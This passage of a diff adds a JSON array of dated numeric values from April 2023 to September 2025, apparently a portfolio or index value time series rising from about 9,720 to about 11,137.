9720.298801604667 + ], + [ + "2023-04-19", + 9721.439028753677 + ], + [ + "2023-04-20", + 9722.579389655564 + ], + [ + "2023-04-21", + 9723.719884326021 + ], + [ + "2023-04-24", + 9724.860512780739 + ], + [ + "2023-04-25", + 9726.001275035409 + ], + [ + "2023-04-26", + 9727.14217110573 + ], + [ + "2023-04-27", + 9728.283201007396 + ], + [ + "2023-04-28", + 9729.424364756107 + ], + [ + "2023-05-01", + 9730.565662367564 + ], + [ + "2023-05-02", + 9731.707093857469 + ], + [ + "2023-05-03", + 9732.848659241527 + ], + [ + "2023-05-04", + 9733.990358535444 + ], + [ + "2023-05-05", + 9735.132191754928 + ], + [ + "2023-05-08", + 9736.27415891569 + ], + [ + "2023-05-09", + 9737.416260033442 + ], + [ + "2023-05-10", + 9738.558495123896 + ], + [ + "2023-05-11", + 9739.700864202769 + ], + [ + "2023-05-12", + 9740.843367285775 + ], + [ + "2023-05-15", + 9741.986004388638 + ], + [ + "2023-05-16", + 9743.128775527077 + ], + [ + "2023-05-17", + 9744.271680716813 + ], + [ + "2023-05-18", + 9745.414719973573 + ], + [ + "2023-05-19", + 9746.557893313082 + ], + [ + "2023-05-22", + 9747.70120075107 + ], + [ + "2023-05-23", + 9748.844642303266 + ], + [ + "2023-05-24", + 9749.988217985403 + ], + [ + "2023-05-25", + 9751.131927813214 + ], + [ + "2023-05-26", + 9752.275771802437 + ], + [ + "2023-05-30", + 9753.419749968807 + ], + [ + "2023-05-31", + 9754.563862328065 + ], + [ + "2023-06-01", + 9755.708108895951 + ], + [ + "2023-06-02", + 9756.85248968821 + ], + [ + "2023-06-05", + 9757.997004720586 + ], + [ + "2023-06-06", + 9759.141654008825 + ], + [ + "2023-06-07", + 9760.286437568677 + ], + [ + "2023-06-08", + 9761.43135541589 + ], + [ + "2023-06-09", + 9762.576407566221 + ], + [ + "2023-06-12", + 9763.721594035422 + ], + [ + "2023-06-13", + 9764.866914839247 + ], + [ + "2023-06-14", + 9766.012369993457 + ], + [ + "2023-06-15", + 9767.15795951381 + ], + [ + "2023-06-16", + 9768.303683416068 + ], + [ + "2023-06-20", + 9769.449541715996 + ], + [ + "2023-06-21", + 9770.595534429358 + ], + [ + "2023-06-22", + 9771.741661571921 + ], + [ + "2023-06-23", + 9772.887923159455 + ], + [ + "2023-06-26", + 9774.034319207729 + ], + [ + "2023-06-27", + 9775.180849732516 + ], + [ + "2023-06-28", + 9776.327514749593 + ], + [ + "2023-06-29", + 9777.474314274736 + ], + [ + "2023-06-30", + 9778.621248323721 + ], + [ + "2023-07-03", + 9779.76831691233 + ], + [ + "2023-07-05", + 9780.915520056344 + ], + [ + "2023-07-06", + 9782.062857771547 + ], + [ + "2023-07-07", + 9783.210330073725 + ], + [ + "2023-07-10", + 9784.357936978666 + ], + [ + "2023-07-11", + 9785.505678502159 + ], + [ + "2023-07-12", + 9786.653554659995 + ], + [ + "2023-07-13", + 9787.801565467968 + ], + [ + "2023-07-14", + 9788.949710941872 + ], + [ + "2023-07-17", + 9790.097991097504 + ], + [ + "2023-07-18", + 9791.246405950662 + ], + [ + "2023-07-19", + 9792.394955517148 + ], + [ + "2023-07-20", + 9793.543639812764 + ], + [ + "2023-07-21", + 9794.692458853313 + ], + [ + "2023-07-24", + 9795.841412654603 + ], + [ + "2023-07-25", + 9796.990501232442 + ], + [ + "2023-07-26", + 9798.139724602637 + ], + [ + "2023-07-27", + 9799.289082781002 + ], + [ + "2023-07-28", + 9800.43857578335 + ], + [ + "2023-07-31", + 9801.588203625495 + ], + [ + "2023-08-01", + 9802.737966323257 + ], + [ + "2023-08-02", + 9803.887863892453 + ], + [ + "2023-08-03", + 9805.037896348904 + ], + [ + "2023-08-04", + 9806.188063708432 + ], + [ + "2023-08-07", + 9807.338365986865 + ], + [ + "2023-08-08", + 9808.488803200027 + ], + [ + "2023-08-09", + 9809.639375363746 + ], + [ + "2023-08-10", + 9810.790082493853 + ], + [ + "2023-08-11", + 9811.94092460618 + ], + [ + "2023-08-14", + 9813.091901716562 + ], + [ + "2023-08-15", + 9814.24301384083 + ], + [ + "2023-08-16", + 9815.394260994828 + ], + [ + "2023-08-17", + 9816.545643194391 + ], + [ + "2023-08-18", + 9817.697160455364 + ], + [ + "2023-08-21", + 9818.848812793587 + ], + [ + "2023-08-22", + 9820.000600224907 + ], + [ + "2023-08-23", + 9821.15252276517 + ], + [ + "2023-08-24", + 9822.304580430224 + ], + [ + "2023-08-25", + 9823.456773235921 + ], + [ + "2023-08-28", + 9824.609101198113 + ], + [ + "2023-08-29", + 9825.761564332655 + ], + [ + "2023-08-30", + 9826.914162655403 + ], + [ + "2023-08-31", + 9828.066896182214 + ], + [ + "2023-09-01", + 9829.21976492895 + ], + [ + "2023-09-05", + 9830.372768911471 + ], + [ + "2023-09-06", + 9831.525908145642 + ], + [ + "2023-09-07", + 9832.679182647327 + ], + [ + "2023-09-08", + 9833.832592432394 + ], + [ + "2023-09-11", + 9834.986137516713 + ], + [ + "2023-09-12", + 9836.139817916153 + ], + [ + "2023-09-13", + 9837.29363364659 + ], + [ + "2023-09-14", + 9838.447584723897 + ], + [ + "2023-09-15", + 9839.601671163951 + ], + [ + "2023-09-18", + 9840.75589298263 + ], + [ + "2023-09-19", + 9841.910250195815 + ], + [ + "2023-09-20", + 9843.064742819388 + ], + [ + "2023-09-21", + 9844.219370869234 + ], + [ + "2023-09-22", + 9845.374134361238 + ], + [ + "2023-09-25", + 9846.529033311288 + ], + [ + "2023-09-26", + 9847.684067735274 + ], + [ + "2023-09-27", + 9848.839237649088 + ], + [ + "2023-09-28", + 9849.994543068624 + ], + [ + "2023-09-29", + 9851.149984009775 + ], + [ + "2023-10-02", + 9852.30556048844 + ], + [ + "2023-10-03", + 9853.461272520517 + ], + [ + "2023-10-04", + 9854.617120121908 + ], + [ + "2023-10-05", + 9855.773103308515 + ], + [ + "2023-10-06", + 9856.929222096242 + ], + [ + "2023-10-09", + 9858.085476500997 + ], + [ + "2023-10-10", + 9859.241866538689 + ], + [ + "2023-10-11", + 9860.398392225226 + ], + [ + "2023-10-12", + 9861.555053576521 + ], + [ + "2023-10-13", + 9862.711850608488 + ], + [ + "2023-10-16", + 9863.868783337044 + ], + [ + "2023-10-17", + 9865.025851778106 + ], + [ + "2023-10-18", + 9866.183055947593 + ], + [ + "2023-10-19", + 9867.340395861425 + ], + [ + "2023-10-20", + 9868.497871535528 + ], + [ + "2023-10-23", + 9869.655482985827 + ], + [ + "2023-10-24", + 9870.813230228248 + ], + [ + "2023-10-25", + 9871.97111327872 + ], + [ + "2023-10-26", + 9873.129132153173 + ], + [ + "2023-10-27", + 9874.287286867542 + ], + [ + "2023-10-30", + 9872.45557743776 + ], + [ + "2023-10-31", + 9882.789072446543 + ], + [ + "2023-11-01", + 9890.399802637576 + ], + [ + "2023-11-02", + 9891.559983265732 + ], + [ + "2023-11-03", + 9892.720299987384 + ], + [ + "2023-11-06", + 9890.8907528185 + ], + [ + "2023-11-07", + 9901.882123805924 + ], + [ + "2023-11-08", + 9903.043651352998 + ], + [ + "2023-11-09", + 9904.205315151567 + ], + [ + "2023-11-10", + 9905.367115217612 + ], + [ + "2023-11-13", + 9903.539051567119 + ], + [ + "2023-11-14", + 9922.438263089743 + ], + [ + "2023-11-15", + 9923.602201948297 + ], + [ + "2023-11-16", + 9924.766277341201 + ], + [ + "2023-11-17", + 9925.930489284472 + ], + [ + "2023-11-20", + 9927.094837794128 + ], + [ + "2023-11-21", + 9928.259322886188 + ], + [ + "2023-11-22", + 9929.423944576674 + ], + [ + "2023-11-24", + 9930.58870288161 + ], + [ + "2023-11-27", + 9931.753597817022 + ], + [ + "2023-11-28", + 9932.918629398935 + ], + [ + "2023-11-29", + 9934.08379764338 + ], + [ + "2023-11-30", + 9935.249102566386 + ], + [ + "2023-12-01", + 9936.414544183986 + ], + [ + "2023-12-04", + 9937.580122512218 + ], + [ + "2023-12-05", + 9938.745837567116 + ], + [ + "2023-12-06", + 9939.911689364719 + ], + [ + "2023-12-07", + 9941.077677921068 + ], + [ + "2023-12-08", + 9942.243803252206 + ], + [ + "2023-12-11", + 9943.410065374175 + ], + [ + "2023-12-12", + 9944.576464303023 + ], + [ + "2023-12-13", + 9945.743000054797 + ], + [ + "2023-12-14", + 9946.909672645546 + ], + [ + "2023-12-15", + 9948.076482091323 + ], + [ + "2023-12-18", + 9949.243428408181 + ], + [ + "2023-12-19", + 9950.410511612175 + ], + [ + "2023-12-20", + 9951.577731719364 + ], + [ + "2023-12-21", + 9952.745088745807 + ], + [ + "2023-12-22", + 9953.912582707564 + ], + [ + "2023-12-26", + 9955.080213620698 + ], + [ + "2023-12-27", + 9956.247981501276 + ], + [ + "2023-12-28", + 9957.415886365363 + ], + [ + "2023-12-29", + 9958.583928229027 + ], + [ + "2024-01-02", + 9956.762107108341 + ], + [ + "2024-01-03", + 9944.058718566954 + ], + [ + "2024-01-04", + 9935.535003289051 + ], + [ + "2024-01-05", + 9945.552156122076 + ], + [ + "2024-01-08", + 9971.084263118939 + ], + [ + "2024-01-09", + 9969.26390833396 + ], + [ + "2024-01-10", + 9976.394604291288 + ], + [ + "2024-01-11", + 9977.56487242905 + ], + [ + "2024-01-12", + 9978.735277843609 + ], + [ + "2024-01-16", + 9976.91582055107 + ], + [ + "2024-01-17", + 9972.841338521308 + ], + [ + "2024-01-18", + 9985.744276840509 + ], + [ + "2024-01-19", + 9986.915641729584 + ], + [ + "2024-01-22", + 9988.08714402411 + ], + [ + "2024-01-23", + 9989.258783740206 + ], + [ + "2024-01-24", + 9990.430560893992 + ], + [ + "2024-01-25", + 9991.60247550159 + ], + [ + "2024-01-26", + 9992.774527579124 + ], + [ + "2024-01-29", + 9993.946717142719 + ], + [ + "2024-01-30", + 9995.119044208503 + ], + [ + "2024-01-31", + 9993.301508792605 + ], + [ + "2024-02-01", + 10006.077186237764 + ], + [ + "2024-02-02", + 10007.250936252623 + ], + [ + "2024-02-05", + 10008.424823952719 + ], + [ + "2024-02-06", + 10009.5988493542 + ], + [ + "2024-02-07", + 10010.773012473222 + ], + [ + "2024-02-08", + 10011.94731332594 + ], + [ + "2024-02-09", + 10013.121751928507 + ], + [ + "2024-02-12", + 10014.296328297085 + ], + [ + "2024-02-13", + 10012.481042447833 + ], + [ + "2024-02-14", + 10026.850995308392 + ], + [ + "2024-02-15", + 10028.027182168207 + ], + [ + "2024-02-16", + 10029.203506999109 + ], + [ + "2024-02-20", + 10027.38996981728 + ], + [ + "2024-02-21", + 10025.63295502131 + ], + [ + "2024-02-22", + 10044.868603989917 + ], + [ + "2024-02-23", + 10046.046904382143 + ], + [ + "2024-02-26", + 10047.225342993383 + ], + [ + "2024-02-27", + 10045.413919839848 + ], + [ + "2024-02-28", + 10041.094430308885 + ], + [ + "2024-02-29", + 10063.99921395033 + ], + [ + "2024-03-01", + 10065.179758434153 + ], + [ + "2024-03-04", + 10066.36044140023 + ], + [ + "2024-03-05", + 10064.551262864801 + ], + [ + "2024-03-06", + 10079.217628618519 + ], + [ + "2024-03-07", + 10090.124240084742 + ], + [ + "2024-03-08", + 10091.307849131155 + ], + [ + "2024-03-11", + 10092.491597019305 + ], + [ + "2024-03-12", + 10090.685483765477 + ], + [ + "2024-03-13", + 10082.945781683184 + ], + [ + "2024-03-14", + 10085.13075191976 + ], + [ + "2024-03-15", + 10047.627372581455 + ], + [ + "2024-03-18", + 10115.57476658314 + ], + [ + "2024-03-19", + 10113.77136107083 + ], + [ + "2024-03-20", + 10132.536550908457 + ], + [ + "2024-03-21", + 10133.725135076442 + ], + [ + "2024-03-22", + 10134.913858669765 + ], + [ + "2024-03-25", + 10136.10272170478 + ], + [ + "2024-03-26", + 10134.301724197843 + ], + [ + "2024-03-27", + 10144.446854799196 + ], + [ + "2024-03-28", + 10147.456674650512 + ], + [ + "2024-04-01", + 10159.100556351439 + ], + [ + "2024-04-02", + 10157.302256575917 + ], + [ + "2024-04-03", + 10166.174527307387 + ], + [ + "2024-04-04", + 10167.367057334928 + ], + [ + "2024-04-05", + 10168.559727250671 + ], + [ + "2024-04-08", + 10169.752537071025 + ], + [ + "2024-04-09", + 10167.9554868124 + ], + [ + "2024-04-10", + 10160.549276045442 + ], + [ + "2024-04-11", + 10176.78748168735 + ], + [ + "2024-04-12", + 10177.981256653857 + ], + [ + "2024-04-15", + 10179.1751716546 + ], + [ + "2024-04-16", + 10177.379226706007 + ], + [ + "2024-04-17", + 10155.609934683655 + ], + [ + "2024-04-18", + 10147.393533304905 + ], + [ + "2024-04-19", + 10044.55961380413 + ], + [ + "2024-04-22", + 10120.105979346015 + ], + [ + "2024-04-23", + 10194.915105496624 + ], + [ + "2024-04-24", + 10204.677929983662 + ], + [ + "2024-04-25", + 10202.973909091474 + ], + [ + "2024-04-26", + 10217.099343993992 + ], + [ + "2024-04-29", + 10218.297847691658 + ], + [ + "2024-04-30", + 10216.506491978258 + ], + [ + "2024-05-01", + 10208.435369683493 + ], + [ + "2024-05-02", + 10233.071788213123 + ], + [ + "2024-05-03", + 10234.272165537815 + ], + [ + "2024-05-06", + 10235.472683671225 + ], + [ + "2024-05-07", + 10233.68334262987 + ], + [ + "2024-05-08", + 10240.969863496539 + ], + [ + "2024-05-09", + 10254.767687160702 + ], + [ + "2024-05-10", + 10264.134159185207 + ], + [ + "2024-05-13", + 10265.338180241375 + ], + [ + "2024-05-14", + 10263.552342533685 + ], + [ + "2024-05-15", + 10285.186147489147 + ], + [ + "2024-05-16", + 10286.392638021725 + ], + [ + "2024-05-17", + 10287.599270080125 + ], + [ + "2024-05-20", + 10288.806043680946 + ], + [ + "2024-05-21", + 10290.012958840793 + ], + [ + "2024-05-22", + 10291.22001557627 + ], + [ + "2024-05-23", + 10292.427213903984 + ], + [ + "2024-05-24", + 10293.634553840546 + ], + [ + "2024-05-28", + 10294.842035402566 + ], + [ + "2024-05-29", + 10296.049658606657 + ], + [ + "2024-05-30", + 10294.267423469435 + ], + [ + "2024-05-31", + 10298.804070241644 + ], + [ + "2024-06-03", + 10305.220909637386 + ], + [ + "2024-06-04", + 10306.429750321971 + ], + [ + "2024-06-05", + 10307.638732808058 + ], + [ + "2024-06-06", + 10308.84785711228 + ], + [ + "2024-06-07", + 10310.057123251274 + ], + [ + "2024-06-10", + 10311.266531241676 + ], + [ + "2024-06-11", + 10312.476081100127 + ], + [ + "2024-06-12", + 10313.68577284327 + ], + [ + "2024-06-13", + 10314.895606487746 + ], + [ + "2024-06-14", + 10316.1055820502 + ], + [ + "2024-06-17", + 10317.315699547284 + ], + [ + "2024-06-18", + 10318.525958995642 + ], + [ + "2024-06-20", + 10319.73636041193 + ], + [ + "2024-06-21", + 10320.946903812797 + ], + [ + "2024-06-24", + 10319.167589214903 + ], + [ + "2024-06-25", + 10330.013146463485 + ], + [ + "2024-06-26", + 10331.224895369523 + ], + [ + "2024-06-27", + 10332.43678641821 + ], + [ + "2024-06-28", + 10333.648819626216 + ], + [ + "2024-07-01", + 10334.86099501022 + ], + [ + "2024-07-02", + 10336.073312586897 + ], + [ + "2024-07-03", + 10337.285772372928 + ], + [ + "2024-07-05", + 10338.498374384995 + ], + [ + "2024-07-08", + 10339.711118639781 + ], + [ + "2024-07-09", + 10340.924005153973 + ], + [ + "2024-07-10", + 10342.137033944256 + ], + [ + "2024-07-11", + 10340.360205027324 + ], + [ + "2024-07-12", + 10352.744904692265 + ], + [ + "2024-07-15", + 10353.959320117965 + ], + [ + "2024-07-16", + 10355.173877999106 + ], + [ + "2024-07-17", + 10356.388578352397 + ], + [ + "2024-07-18", + 10354.613421194548 + ], + [ + "2024-07-19", + 10337.328877851514 + ], + [ + "2024-07-22", + 10382.380290466503 + ], + [ + "2024-07-23", + 10383.598182233016 + ], + [ + "2024-07-24", + 10384.816216862757 + ], + [ + "2024-07-25", + 10383.044394372484 + ], + [ + "2024-07-26", + 10407.9291818479 + ], + [ + "2024-07-29", + 10426.08334647343 + ], + [ + "2024-07-30", + 10427.306364770719 + ], + [ + "2024-07-31", + 10428.529526532595 + ], + [ + "2024-08-01", + 10426.76283177589 + ], + [ + "2024-08-02", + 10345.621072481325 + ], + [ + "2024-08-05", + 10196.201031854178 + ], + [ + "2024-08-06", + 10262.854216029464 + ], + [ + "2024-08-07", + 10188.72169359499 + ], + [ + "2024-08-08", + 10426.68565040518 + ], + [ + "2024-08-09", + 10459.606081626209 + ], + [ + "2024-08-12", + 10514.306828280392 + ], + [ + "2024-08-13", + 10596.555730745442 + ], + [ + "2024-08-14", + 10615.46602168552 + ], + [ + "2024-08-15", + 10620.007757498955 + ], + [ + "2024-08-16", + 10637.55991621286 + ], + [ + "2024-08-19", + 10703.618546266862 + ], + [ + "2024-08-20", + 10704.874120473805 + ], + [ + "2024-08-21", + 10706.129841964268 + ], + [ + "2024-08-22", + 10704.395710755525 + ], + [ + "2024-08-23", + 10742.697307430533 + ], + [ + "2024-08-26", + 10754.161438988198 + ], + [ + "2024-08-27", + 10755.422942064166 + ], + [ + "2024-08-28", + 10756.684593119131 + ], + [ + "2024-08-29", + 10754.95639217045 + ], + [ + "2024-08-30", + 10793.17624779035 + ], + [ + "2024-09-03", + 10794.442327448285 + ], + [ + "2024-09-04", + 10795.708555622066 + ], + [ + "2024-09-05", + 10793.984932329115 + ], + [ + "2024-09-06", + 10704.377477021104 + ], + [ + "2024-09-09", + 10788.70878385405 + ], + [ + "2024-09-10", + 10825.509043160057 + ], + [ + "2024-09-11", + 10826.778915574967 + ], + [ + "2024-09-12", + 10825.058936950629 + ], + [ + "2024-09-13", + 10852.285019017878 + ], + [ + "2024-09-16", + 10866.190135076173 + ], + [ + "2024-09-17", + 10867.464779534248 + ], + [ + "2024-09-18", + 10868.739573512852 + ], + [ + "2024-09-19", + 10867.024517029526 + ], + [ + "2024-09-20", + 10875.365519433119 + ], + [ + "2024-09-23", + 10908.901198800173 + ], + [ + "2024-09-24", + 10910.180853424645 + ], + [ + "2024-09-25", + 10911.460658157357 + ], + [ + "2024-09-26", + 10909.750613015916 + ], + [ + "2024-09-27", + 10902.047876747336 + ], + [ + "2024-09-30", + 10939.1508228328 + ], + [ + "2024-10-01", + 10940.434025850514 + ], + [ + "2024-10-02", + 10941.717379392707 + ], + [ + "2024-10-03", + 10940.010883477036 + ], + [ + "2024-10-04", + 10970.865778516623 + ], + [ + "2024-10-07", + 10972.152701816423 + ], + [ + "2024-10-08", + 10973.439776077104 + ], + [ + "2024-10-09", + 10974.727001316376 + ], + [ + "2024-10-10", + 10973.02437755195 + ], + [ + "2024-10-11", + 10980.064890510483 + ], + [ + "2024-10-14", + 10993.703185994089 + ], + [ + "2024-10-15", + 10994.9927882066 + ], + [ + "2024-10-16", + 10996.28254169424 + ], + [ + "2024-10-17", + 10997.572446474753 + ], + [ + "2024-10-18", + 10998.862502565888 + ], + [ + "2024-10-21", + 11000.152709985394 + ], + [ + "2024-10-22", + 11001.443068751021 + ], + [ + "2024-10-23", + 10999.743578880523 + ], + [ + "2024-10-24", + 11010.331335651672 + ], + [ + "2024-10-25", + 11011.622888407892 + ], + [ + "2024-10-28", + 11012.914592668047 + ], + [ + "2024-10-29", + 11014.206448449908 + ], + [ + "2024-10-30", + 11015.49845577125 + ], + [ + "2024-10-31", + 11013.80061464985 + ], + [ + "2024-11-01", + 11028.914119114635 + ], + [ + "2024-11-04", + 11030.207851700368 + ], + [ + "2024-11-05", + 11031.501736045739 + ], + [ + "2024-11-06", + 11032.795772168549 + ], + [ + "2024-11-07", + 11034.089960086601 + ], + [ + "2024-11-08", + 11035.384299817702 + ], + [ + "2024-11-11", + 11036.678791379662 + ], + [ + "2024-11-12", + 11037.973434790289 + ], + [ + "2024-11-13", + 11039.268230067395 + ], + [ + "2024-11-14", + 11037.573177228796 + ], + [ + "2024-11-15", + 10928.579367035982 + ], + [ + "2024-11-18", + 11003.30938060324 + ], + [ + "2024-11-19", + 11047.919967366963 + ], + [ + "2024-11-20", + 11065.555823591789 + ], + [ + "2024-11-21", + 11063.86385438554 + ], + [ + "2024-11-22", + 11076.198746849195 + ], + [ + "2024-11-25", + 11100.099204441378 + ], + [ + "2024-11-26", + 11101.40128730199 + ], + [ + "2024-11-27", + 11102.703522901757 + ], + [ + "2024-11-29", + 11101.015911258595 + ], + [ + "2024-12-02", + 11128.877040838495 + ], + [ + "2024-12-03", + 11130.182499446193 + ], + [ + "2024-12-04", + 11131.488111189034 + ], + [ + "2024-12-05", + 11132.79387608498 + ], + [ + "2024-12-06", + 11134.099794151998 + ], + [ + "2024-12-09", + 11135.405865408056 + ], + [ + "2024-12-10", + 11136.712089871122 + ], + [ + "2024-12-11", + 11138.018467559168 + ], + [ + "2024-12-12", + 11136.33499849017 + ], + [ + "2024-12-13", + 11152.748539797905 + ], + [ + "2024-12-16", + 11154.056798621084 + ], + [ + "2024-12-17", + 11155.365210907883 + ], + [ + "2024-12-18", + 11156.673776676302 + ], + [ + "2024-12-19", + 11154.992495944345 + ], + [ + "2024-12-20", + 11177.63718745119 + ], + [ + "2024-12-23", + 11178.948365805172 + ], + [ + "2024-12-24", + 11180.259697965244 + ], + [ + "2024-12-26", + 11178.581183949449 + ], + [ + "2024-12-27", + 11132.298673486239 + ], + [ + "2024-12-30", + 11089.389608836384 + ], + [ + "2024-12-31", + 11031.219331571136 + ], + [ + "2025-01-02", + 11024.167054455873 + ], + [ + "2025-01-03", + 11120.176015311705 + ], + [ + "2025-01-06", + 11193.278605174655 + ], + [ + "2025-01-07", + 11142.39871361811 + ], + [ + "2025-01-08", + 11170.555420255616 + ], + [ + "2025-01-10", + 11048.720081269765 + ], + [ + "2025-01-13", + 11070.479090659319 + ], + [ + "2025-01-14", + 11076.69863830439 + ], + [ + "2025-01-15", + 11213.197373100478 + ], + [ + "2025-01-16", + 11213.470726485486 + ], + [ + "2025-01-17", + 11253.515096409366 + ], + [ + "2025-01-21", + 11317.631306611998 + ], + [ + "2025-01-22", + 11318.958906796073 + ], + [ + "2025-01-23", + 11320.28666271258 + ], + [ + "2025-01-24", + 11318.624574379788 + ], + [ + "2025-01-27", + 11185.940630120815 + ], + [ + "2025-01-28", + 11290.556034601159 + ], + [ + "2025-01-29", + 11303.080155329366 + ], + [ + "2025-01-30", + 11348.92998435336 + ], + [ + "2025-01-31", + 11372.80968007193 + ], + [ + "2025-02-03", + 11377.910488287065 + ], + [ + "2025-02-04", + 11417.65464972541 + ], + [ + "2025-02-05", + 11418.993983019102 + ], + [ + "2025-02-06", + 11420.333473421562 + ], + [ + "2025-02-07", + 11418.683120951222 + ], + [ + "2025-02-10", + 11462.554863693265 + ], + [ + "2025-02-11", + 11463.899463948808 + ], + [ + "2025-02-12", + 11465.244221930954 + ], + [ + "2025-02-13", + 11466.589137658206 + ], + [ + "2025-02-14", + 11464.944211149064 + ], + [ + "2025-02-18", + 11500.229529931072 + ], + [ + "2025-02-19", + 11501.578549564882 + ], + [ + "2025-02-20", + 11502.927727443704 + ], + [ + "2025-02-21", + 11501.287063586102 + ], + [ + "2025-02-24", + 11488.026103748387 + ], + [ + "2025-02-25", + 11446.143141213033 + ], + [ + "2025-02-26", + 11478.951340351588 + ], + [ + "2025-02-27", + 11202.990834560982 + ], + [ + "2025-02-28", + 11363.459277375858 + ], + [ + "2025-03-03", + 11202.099310104215 + ], + [ + "2025-03-04", + 11190.418246819796 + ], + [ + "2025-03-05", + 11272.964452111595 + ], + [ + "2025-03-06", + 11083.420739680349 + ], + [ + "2025-03-07", + 11148.614656609165 + ], + [ + "2025-03-10", + 10791.559047649367 + ], + [ + "2025-03-11", + 10786.992041359097 + ], + [ + "2025-03-12", + 10848.60035085046 + ], + [ + "2025-03-13", + 10762.596584300147 + ], + [ + "2025-03-14", + 10888.121361810738 + ], + [ + "2025-03-17", + 10964.38926620288 + ], + [ + "2025-03-18", + 10918.797368028003 + ], + [ + "2025-03-19", + 10970.903558164688 + ], + [ + "2025-03-20", + 10974.591796846065 + ], + [ + "2025-03-21", + 10999.84519613177 + ], + [ + "2025-03-24", + 11039.162590167283 + ], + [ + "2025-03-25", + 11067.139601233206 + ], + [ + "2025-03-26", + 11020.042240058103 + ], + [ + "2025-03-27", + 11019.795733779949 + ], + [ + "2025-03-28", + 10877.458899839254 + ], + [ + "2025-03-31", + 10898.404949654385 + ], + [ + "2025-04-01", + 10941.785577707176 + ], + [ + "2025-04-02", + 10984.147040137948 + ], + [ + "2025-04-03", + 10654.90870558612 + ], + [ + "2025-04-04", + 10304.06620451437 + ], + [ + "2025-04-07", + 10349.2732050761 + ], + [ + "2025-04-08", + 10289.235642247722 + ], + [ + "2025-04-09", + 10464.518092269387 + ], + [ + "2025-04-10", + 10451.839130344808 + ], + [ + "2025-04-11", + 10471.88705126682 + ], + [ + "2025-04-14", + 10549.18240049689 + ], + [ + "2025-04-15", + 10574.488897141919 + ], + [ + "2025-04-16", + 10575.729323961454 + ], + [ + "2025-04-17", + 10576.969896287663 + ], + [ + "2025-04-21", + 10575.220614137612 + ], + [ + "2025-04-22", + 10639.792830447203 + ], + [ + "2025-04-23", + 10682.692839385412 + ], + [ + "2025-04-24", + 10683.945958929226 + ], + [ + "2025-04-25", + 10685.199225468614 + ], + [ + "2025-04-28", + 10683.462639020823 + ], + [ + "2025-04-29", + 10723.297785521041 + ], + [ + "2025-04-30", + 10747.275235055778 + ], + [ + "2025-05-01", + 10796.504296125131 + ], + [ + "2025-05-02", + 10797.770766175496 + ], + [ + "2025-05-05", + 10796.047384787502 + ], + [ + "2025-05-06", + 10784.276664875426 + ], + [ + "2025-05-07", + 10823.18469489493 + ], + [ + "2025-05-08", + 10947.679801473563 + ], + [ + "2025-05-09", + 10948.964004972146 + ], + [ + "2025-05-12", + 10950.24835911257 + ], + [ + "2025-05-13", + 10951.532863912502 + ], + [ + "2025-05-14", + 10952.817519389619 + ], + [ + "2025-05-15", + 10954.102325561595 + ], + [ + "2025-05-16", + 10955.387282446105 + ], + [ + "2025-05-19", + 10956.67239006083 + ], + [ + "2025-05-20", + 10957.957648423451 + ], + [ + "2025-05-21", + 10956.253057551652 + ], + [ + "2025-05-22", + 10976.039365223585 + ], + [ + "2025-05-23", + 10959.07737145909 + ], + [ + "2025-05-27", + 11004.584922659995 + ], + [ + "2025-05-28", + 11002.88580134063 + ], + [ + "2025-05-29", + 11015.541499565494 + ], + [ + "2025-05-30", + 11020.9323461052 + ], + [ + "2025-06-02", + 11050.468467226436 + ], + [ + "2025-06-03", + 11051.764728217251 + ], + [ + "2025-06-04", + 11053.061141264296 + ], + [ + "2025-06-05", + 11054.357706385405 + ], + [ + "2025-06-06", + 11055.654423598418 + ], + [ + "2025-06-09", + 11056.951292921176 + ], + [ + "2025-06-10", + 11058.248314371522 + ], + [ + "2025-06-11", + 11059.545487967302 + ], + [ + "2025-06-12", + 11060.842813726362 + ], + [ + "2025-06-13", + 11062.14029166655 + ], + [ + "2025-06-16", + 11063.43792180572 + ], + [ + "2025-06-17", + 11064.735704161725 + ], + [ + "2025-06-18", + 11066.03363875242 + ], + [ + "2025-06-20", + 11067.331725595663 + ], + [ + "2025-06-23", + 11068.629964709313 + ], + [ + "2025-06-24", + 11069.928356111233 + ], + [ + "2025-06-25", + 11071.226899819287 + ], + [ + "2025-06-26", + 11072.525595851339 + ], + [ + "2025-06-27", + 11073.82444422526 + ], + [ + "2025-06-30", + 11075.123444958917 + ], + [ + "2025-07-01", + 11076.422598070187 + ], + [ + "2025-07-02", + 11077.72190357694 + ], + [ + "2025-07-03", + 11079.021361497054 + ], + [ + "2025-07-07", + 11080.320971848409 + ], + [ + "2025-07-08", + 11081.620734648885 + ], + [ + "2025-07-09", + 11082.920649916363 + ], + [ + "2025-07-10", + 11084.22071766873 + ], + [ + "2025-07-11", + 11085.520937923873 + ], + [ + "2025-07-14", + 11086.82131069968 + ], + [ + "2025-07-15", + 11088.121836014045 + ], + [ + "2025-07-16", + 11089.422513884858 + ], + [ + "2025-07-17", + 11090.723344330016 + ], + [ + "2025-07-18", + 11092.024327367417 + ], + [ + "2025-07-21", + 11093.325463014959 + ], + [ + "2025-07-22", + 11094.626751290545 + ], + [ + "2025-07-23", + 11095.928192212079 + ], + [ + "2025-07-24", + 11097.229785797466 + ], + [ + "2025-07-25", + 11098.531532064615 + ], + [ + "2025-07-28", + 11099.833431031435 + ], + [ + "2025-07-29", + 11101.13548271584 + ], + [ + "2025-07-30", + 11102.437687135742 + ], + [ + "2025-07-31", + 11103.74004430906 + ], + [ + "2025-08-01", + 11105.042554253709 + ], + [ + "2025-08-04", + 11106.345216987613 + ], + [ + "2025-08-05", + 11107.648032528692 + ], + [ + "2025-08-06", + 11108.951000894873 + ], + [ + "2025-08-07", + 11110.254122104083 + ], + [ + "2025-08-08", + 11111.55739617425 + ], + [ + "2025-08-11", + 11112.860823123307 + ], + [ + "2025-08-12", + 11114.164402969183 + ], + [ + "2025-08-13", + 11115.468135729818 + ], + [ + "2025-08-14", + 11116.772021423147 + ], + [ + "2025-08-15", + 11118.076060067111 + ], + [ + "2025-08-18", + 11119.380251679651 + ], + [ + "2025-08-19", + 11120.68459627871 + ], + [ + "2025-08-20", + 11121.989093882235 + ], + [ + "2025-08-21", + 11123.293744508173 + ], + [ + "2025-08-22", + 11124.598548174476 + ], + [ + "2025-08-25", + 11125.903504899094 + ], + [ + "2025-08-26", + 11127.208614699983 + ], + [ + "2025-08-27", + 11128.513877595098 + ], + [ + "2025-08-28", + 11129.819293602399 + ], + [ + "2025-08-29", + 11131.124862739845 + ], + [ + "2025-09-02", + 11132.4305850254 + ], + [ + "2025-09-03", + 11133.736460477028 + ], + [ + "2025-09-04", + 11135.042489112697 + ], + [ + "2025-09-05", + 11136.348670950374 + ], + [ + "2025-09-08", + 11137.655006008032 + ], + [ + "2025-09-09", + 